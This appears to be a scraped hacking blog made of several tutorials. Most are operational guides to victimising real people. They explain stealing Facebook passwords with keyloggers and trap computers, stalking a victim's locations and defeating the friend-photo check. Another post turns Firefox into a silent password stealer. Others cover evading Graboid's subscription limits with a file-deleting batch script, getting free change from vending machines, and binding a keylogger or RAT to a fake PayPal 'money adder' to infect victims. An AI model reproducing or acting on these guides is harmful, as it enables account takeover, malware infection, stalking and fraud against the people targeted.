Ok, here's a new quick tutorial for everyone who has been having to deal with Facebook blocking your entrance into someone's account due to logging in from a different location.

Ever since I had been problems constantly having to deal with Facebook leaving me out off people's accounts I began to think that I should write over my experiences to help others.

I will go over specific techniques and ideas to eventually grant you entrance to their accounts without having to deal with that Facebook problem having logging in from different location.

1. Before you even begin reading this, you must already have their passwords or e-mails. If not, I will tell you a few ideas of how to acquire them.

If you only want to log in without changing passwords, I would suggest that you steal their passwords through Phishing, Keylogging, or Social Engineering.

2. Bypassing Facebook security can be done through black hat methods, however I will not go over those methods, instead I will be touching the social engineering methods which are more effective and you can get faster results.

3. You will need to use your brain to think and have patience. If you don't have either a brain to think or the patience to wait, please don't continue reading this tutorial because you will not get any success.

Ok, let's move on to the actual information.

-This method is a cheap shot method, but you never know if it might work or not.

1. If a person uses a particular computer to log in to their accounts on a regular basis, THAT computer alone should be your focus.

You should infect that computer with a keylogger and have it linked together with a FTP to send you the logs or linked to send you e-mails.

2. Another method is to use your OWN computer to acquire the password by infecting yourself with a keylogger and let the slave use your computer. Gain their trust to the point of where they can log in to different websites.

You can say for instance "My account is not working, I think Facebook banned me. Can you test your account to see if yours is working?"

And of course, they will log in and you will gain the information. After they successfully log in, you can login to your account and say "Oh, there we go! It worked"

Now, you will attempt to log in in the future and the problem of Logging in from another location will disappear.

3. Let's say that they aren't stupid enough to use your computer to log in, you might think, what then? Well, here's my next suggestion to you.

Considering that you will already have the password through the methods I mentioned earlier, but you will have the problem of Logging in from another location.

Here's what you do:

Watch and study your slave, if you know he/she uses a location to use a computer, you should attempt to log in at that same location as well. It could be school, library, another friend's house, etc...

Most people will use any computer to log in to Social Networks or E-mails to check on updates. Considering that the IP you log in at that particular is the same within their network, the problem of Logging in from another location will not come up.

4. So, you don't have the choice of either offering your computer as a trap or the chance to "stalk" your slave. You wonder, what do I do then?

Well, this is where it gets more tricky considering that Facebook finally came up with an ingenious method to avoid intruders of taking over accounts easily.

Here's what Facebook did, in case if you don't already know. Facebook implemented a feature where you must visually recognize the friends on that account. They will show you pictures of random people within that account and ask you to select the name of that person.


If you don't recognize any of those people, you're screwed.

When will this happen? That will only happen when you attempt to change their passwords, so Facebook makes sure that you do in fact own that account. I personally wouldn't attempt to change the passwords, but if you do try, here's what I would recommend to you.

-If you know the person in person, notice who he/she is friends with to try to recognize the faces and physically ask the other persons their names.

If you do not know the person, you can use websites like:


To search their names, e-mails, phone numbers to see whether if you can find them on other Social networks. You can search the person's name manually by going to Myspace, Facebook, etc...To see who they have added as friends.

Your next step will be to add a friend of the slave or the slave directly. Adding the slave directly would probably be the best plan because you would have access directly to all the victims' friends and their pictures.

Now, all you have to do is match the pictures that Facebook asks you when you attempt to change their passwords by going to the victims friends and match them.

If you don't want to change their passwords, you can mask the slave's IP using other methods in which I will not go over. To find out their IP, you will need a RAT to manually whois them or any other method other there to find their IP.

A quick method I will suggest to you is to send the slave an e-mail if they have a hotmail account. When they reply you can right click on the e-mail and view source. You will see an IP from sender and use that to mask.

Mask their IP and facebook will not give you the problem of Logging in from another location.

If you follow the suggestions I have given you, you will surely gain entrance to their accounts and Facebook won't be able to do crap.

Their security is strong, but good ol' Social engineering never fails

How To Hack GraboidTo Get Unlimited Movies

Hii! This is Pc Hackers Guru
So if some of you may have heard, Graboid offers free movies, TV shows and more to download. It is subscription based on bandwidth. In this post i am going to show you how to download as much as you want videos, movies, and TV shows through Graboid for free.

First, download the program HERE.

Then after you open the program you will have the option to create and account.


Create it and log in. You will notice your bandwidth restriction, and your account will expire in a month, when you have to buy a subscription.


Once your account has expired, I have discovered a new way to make accounts (NOTE: After your account is created, you will never be able to create a free account again, nor through the program or website).

Make this batch script:

cd %appdata%
del MozillaControl /F /q
cd “%LOCALAPPDATA%\Graboid_Inc\”
del *.* /F /q

Or download it HERE if you don't know how.

Run the batch file, and behold, the new account button shall appear again. Enter a different email address than previous, and your good to go.


For those with issues creating accounts:

1. Renew your IP address (unplug your modem for about 5mins and then reconnect it).

2. If the problem is not solved by number 2, download Hotspot Shield HERE

3. If it still doesn't work, wait a week. This will give a chance for your ISP to reset your IP.

Hope this helped! 

Turn Your Firefox into a stealer without software

Hii! This is Pc Hackers Guru
 Ever wanted to hack your friends accounts, whenever they were over your house. Or you just wanted Firefox to save all your passwords without prompting you every single time! This tutorial is for you, read on!

Steps:

1) Close Firefox

2) Navigate to:

Windows - C:/Program Files/Mozilla Firefox/Components
Mac - Applications > Right click Firefox > Show Package Contents > Contents/MacOS/Components

3) We are going to edit a file called nsLoginManagerPr
ompter.js, it is recommended you create a copy of it so you can replace the original file when you want to turn off this feature.

I recommend you download the following file and simply overwrite the existing nsLoginManagerPrompter.js with it, it is one I have already edited and works.

Download here.

From now on, when someone logs onto any site, they username and password will be saved automatically, without prompt!

To retrieve the account information, make sure Firefox is opened, go to Tools > Options... > Security Tab > click on saved passwords, then click on show passwords, and press yes!

Hope that helped anyone. Enjoy!
FeedBack At  

How To Watch 18+ Videos Without Account

Hii! This is Pc Hackers Guru Know Many about Hacking
View a flagged YouTube video without being logged in or over 18

Don't you hate it when you want to view a video and it's flagged as inappropriate, and you have to be logged in with an 18+ account? Well I found a way to over-come that recently.


Step 1

On the video you want to view, get the video code from the URL.

Example:
http://www.youtube.com/watch?v=O07u7KdRVo0


O07u7KdRVo0 would be the video code in this case.

Step 2

Now add the video code to the following link:

http://www.youtube.com/v/*VIDEO CODE HERE*?fs=1&amp

becomes

http://www.youtube.com/v/O07u7KdRVo0?fs=1&

Step 3

Now, go to that link and you will be able to view it without logging in or being over 18. 

how to Hack Coca Cola Machine

Hii! This is Pc Hackers Guru ,
Here i am going to show you a real way to hack Coca-Cola machines, not that string on a dollar crap.

NOTE: These hacks/methods will ONLY work on Coca-Cola Co. machines (especially their older models) and no other companies. Also, referring to navigation... 1 is the top button, 2 is the second button down, 3 is the third button down, 4 is the fourth button down and so on (I'm talking about the machines that have vertical button options not those big fat buttons which go horizontal).


OK, lets start...

Method 1:

This method (hack) will give you access to any coca-cola (and only coca-cola) machine's menu. From inside the menu you can change the price of a coke from a $1.50 to 0.25 cents and so on...

Step One:

First of all, hit the buttons 4, 2, 3, 1 . Now you're in and have accessed the machines menu!

Step Two:


Navigate and play around!

This is how you navigate through the menu:

1 = Back
2 = Up
3 = Down
4 = Select


Method 2:

This method (hack) should give you free change (seriously).

Step One:

Hold the change button down... nothing will happen, this is to be expected.

Step Two:

Press the following buttons going from left to right in order:

4, 3, 2, 1, 1, 2, 3, 1, 1, 2, 3, 1, 1

Step Three:

Hold the change button down for about 15-25 seconds, and if you've done it right than you should get some free change!


Method 3:

This method will get you a key to actually open the lock on coke machines. This method is actually more social engineering than it is a hack, but o well.

Step One:

Go to a nearby computer store and either tell them that you have lost the key to your 'Security Laptop Computer Lock' and that you will need to buy a new key, or you could just buy the lock too, they really come in handy. Anyways, the key that comes with those type of locks is an exact match of the key that most coca-cola machines use.
also visit  

Protect your Flash Drive Contents Wit Passwordlock

Hii! This is Pc Hackers Guru ,
USB Safeguard Software to encrypt and protect data with a password on your removable pen drive.

USB Safeguard enables you to encrypt and password protect sensitive data on your USB drive. You can selected one or more folders to be encrypted and choose to securely delete the original (unencrypted) files with the built-in file shredder.
Lock your USB Pen Drive with Password : USB Safeguard
Simply drag and drop files and folders to quickly protect your sensitive documents, and then enter an password to encrypt and decrypt the files that you want to protect from prying eyes.
The program also includes a handy Safe Browsing feature that allows you to launch Internet Explorer without leaving any Internet traces on the host computer. Other features include an on-screen keyboard for secure password input and free space wiping.

Download USB Safeguard

USB Safeguard uses 256-bit AES encryption to protect your date. The program is not installed on your PC, it runs directly from your USB pen drive.

How to hide Text in photo(stegnography)

Hii! This is Pc Hackers Guru,
Steganography is the art and science of writing hidden messages in such a way that no one, apart from the sender and intended recipient, suspects the existence of the message, a form of security through obscurity. By using this trick your text will get hidden into any image of your choice without increasing its size or without reducing its quality. Your data will be encrypted in the image with RC_4 encryption plus SHA hashing. So, there is no need to worry that it can be easily cracked by anybody.

Here is the tutorial with trick on how to hide text in images for free:

First download imagehide software. Its a freeware utility for hiding text in an image: Click here to download imagehide

The interface of Imagehide is very simple .Once it is installed all you have to do is to load the image in which you want to hide your text (Steganography) type the text and hit the Write data option.You can also password protect the text so that it can only be opened with the help of a password.


Once you have completed the above steps then you can send the image to your friend and he/she can only open it with the imagehide software and the password that you have used. Once opened with imagehide the text can be read by your friend. So use Steganography for more secure communication.

The imagehide is freeware and supports all Windows OS, like Windows 7, Vista, and XP.
Feedback 

How to hack paypal account by using paypal hacking software

Hii! This is Pc Hackers Guru ,
n my previous post I've been showing How to Hack PayPal Accounts using Fake Login Page. In this article i will show you how to hack PayPal accounts using PayPal hacking software.

This tutorial is written by Saint Andrew, a loyal reader of this blog.

Note: Hacking credit cards or Bank accounts like PayPal is an illegal act, this is only informational post and I am not responsible for any actions done by you after reading this tutorial. This post is for educational purposes only.

This is fake PayPal Money Adder software to help you bind your keylogger or whatever Trojan server you have. This PayPal Money Adder software seems to be used to Add some Money to your PayPal Account, but actually this is fake PayPal Money Adder software used only as means for installing Trojan Server binded with it on victim computer.
PayPal Money Adder to bind your Trojan Server

1. Download link of Fake PayPal Money Adder is HERE

2. PayPal Money Adder is free fake application which appears to hack PayPal Accounts, now run .exe application to see something like this:


Note: PayPal Money Adder is a FAKE application. It doesn’t add any money to your PayPal Account. It is only used to fool victim and to bind your Trojan server.

3. When you open this, there is a TextBox to type your PayPal Email, and you have to select how much money you want to Add. After that, click on Send Money, and Progress Bar will start.

4. When Progress Bar is full, it will says “Money Has Been Added to your Account Successfully “ as in the Picture below, but it wont add any money to your Account !!!


5. So that is one fake PayPal Money Adder, not one real !!!

6. Now create a keylogger or whatever server (like stealer or RAT), crypt it, and bind with this application. You can use Shock Labs File Binder or Easy Binder. You can find some binders on this blog, just search for it !!!

7. Now, send this binded PayPal Money Adder to your victim and tell him this PayPal Money Adder is used to Add Money to PayPal Accounts. You can use Social Engineering for this. So as long as he runs PayPal Money Adder on his computer, your keylogger server is installed on his computer.

8. Many other Fake Hacking Tools are coming soon, like AlertPay Money Adder, Skype Money Adder, Ultimate Password Cracker, Neobux Hacker and other!!! 

Recommend us on Google!

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More